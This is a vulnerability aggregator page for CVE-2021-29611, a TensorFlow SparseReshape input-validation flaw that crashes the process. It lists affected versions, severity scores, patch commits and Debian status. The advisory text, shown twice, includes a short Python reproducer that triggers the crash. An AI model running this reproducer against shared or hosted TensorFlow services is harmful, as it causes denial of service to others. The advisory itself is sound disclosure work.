CVE-2021-29611
published 2021-05-14CVE-2021-29611: TensorFlow is an end-to-end open source platform for machine learning. Incomplete validation in `SparseReshape` results in a denial of service based on a…
medium5.5CVSS 3.1
AVLACLPRLUINSUCNINAH
TensorFlow is an end-to-end open source platform for machine learning. Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure. The implementation(https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are the only affected versions.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | tensorflow | — | — |
| tensorflow | < 2.1.4 | 2.1.4 | |
| tensorflow | >= 2.2.0 < 2.2.3 | 2.2.3 | |
| tensorflow | >= 2.3.0 < 2.3.3 | 2.3.3 | |
| tensorflow | >= 2.4.0 < 2.4.2 | 2.4.2 | |
| intel | optimization_for_tensorflow | >= 0 < 1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6 | 1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6 |
| intel | optimization_for_tensorflow | >= 0 < 2.1.4 | 2.1.4 |
| intel | optimization_for_tensorflow | >= 2.2.0 < 2.2.3 | 2.2.3 |
| intel | optimization_for_tensorflow | >= 2.3.0 < 2.3.3 | 2.3.3 |
| intel | optimization_for_tensorflow | >= 2.4.0 < 2.4.2 | 2.4.2 |
| tensorflow | tensorflow | < 2.3.3 | 2.3.3 |
| tensorflow | tensorflow | — | — |
GHSA
Incomplete validation in `SparseReshape`
ghsa·2021-05-21
CVE-2021-29611 [LOW] CWE-20 Incomplete validation in `SparseReshape`
Incomplete validation in `SparseReshape`
### Impact
Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure.
```python
import tensorflow as tf
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)
tf.raw_ops.SparseReshape(input_indices=input_indices,
input_shape=input_shape,
new_shape=new_shape)
```
The [implementation](https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor.
### Patches
We have patched the issue in GitHub commit [1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6](https://github.com/tensor
OSV
Incomplete validation in `SparseReshape`
osv·2021-05-21
CVE-2021-29611 [LOW] Incomplete validation in `SparseReshape`
Incomplete validation in `SparseReshape`
### Impact
Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure.
```python
import tensorflow as tf
input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64)
input_shape = tf.zeros([11], dtype=tf.int64)
new_shape = tf.zeros([1], dtype=tf.int64)
tf.raw_ops.SparseReshape(input_indices=input_indices,
input_shape=input_shape,
new_shape=new_shape)
```
The [implementation](https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor.
### Patches
We have patched the issue in GitHub commit [1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6](https://github.com/tensor
OSV
CVE-2021-29611: TensorFlow is an end-to-end open source platform for machine learning
osv·2021-05-14
CVE-2021-29611 CVE-2021-29611: TensorFlow is an end-to-end open source platform for machine learning
TensorFlow is an end-to-end open source platform for machine learning. Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure. The implementation(https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are the only affected versions.
Debian
CVE-2021-29611: tensorflow - TensorFlow is an end-to-end open source platform for machine learning. Incomplet...
vendor_debian·2021·CVSS 3.6
CVE-2021-29611 [LOW] CVE-2021-29611: tensorflow - TensorFlow is an end-to-end open source platform for machine learning. Incomplet...
TensorFlow is an end-to-end open source platform for machine learning. Incomplete validation in `SparseReshape` results in a denial of service based on a `CHECK`-failure. The implementation(https://github.com/tensorflow/tensorflow/blob/e87b51ce05c3eb172065a6ea5f48415854223285/tensorflow/core/kernels/sparse_reshape_op.cc#L40) has no validation that the input arguments specify a valid sparse tensor. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3, as these are the only affected versions.
Scope: local
forky: resolved
sid: resolved
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9rpc-5v9q-5r7fhttps://github.com/tensorflow/tensorflow/commit/1d04d7d93f4ed3854abf75d6b712d72c3f70d6b6https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9rpc-5v9q-5r7f
2021-05-14
Published